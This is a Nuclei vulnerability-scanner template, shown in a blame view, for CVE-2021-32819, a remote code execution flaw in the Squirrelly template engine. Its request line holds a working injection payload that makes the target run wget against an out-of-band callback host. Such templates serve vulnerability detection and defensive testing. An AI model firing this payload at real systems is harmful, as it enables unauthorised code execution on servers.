nuclei-templates/cves/2021/CVE-2021-32819.yaml

30 lines
1.4 KiB
YAML
Raw Normal View History

2021-08-20 13:19:00 +00:00
id: CVE-2021-32819
info:
2021-08-20 19:42:52 +00:00
name: Nodejs squirrelly template engine RCE
2021-08-20 13:19:00 +00:00
author: pikpikcu
severity: high
2021-08-20 13:19:00 +00:00
description: |
Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration
options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is
currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.
2021-08-20 19:42:52 +00:00
reference:
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
2021-08-20 13:19:00 +00:00
- https://www.linuxlz.com/aqld/2331.html
2021-08-20 19:42:52 +00:00
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-32819
tags: cve,cve2021,nodejs,rce,oast
2021-08-20 13:19:00 +00:00
requests:
- method: GET
path:
2021-08-20 19:42:52 +00:00
- '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'
2021-08-20 13:19:00 +00:00
2021-08-20 19:42:52 +00:00
matchers:
2021-08-20 13:19:00 +00:00
- type: word
2021-08-20 19:42:52 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
2021-08-20 13:19:00 +00:00
words:
2021-08-20 19:42:52 +00:00
- "http"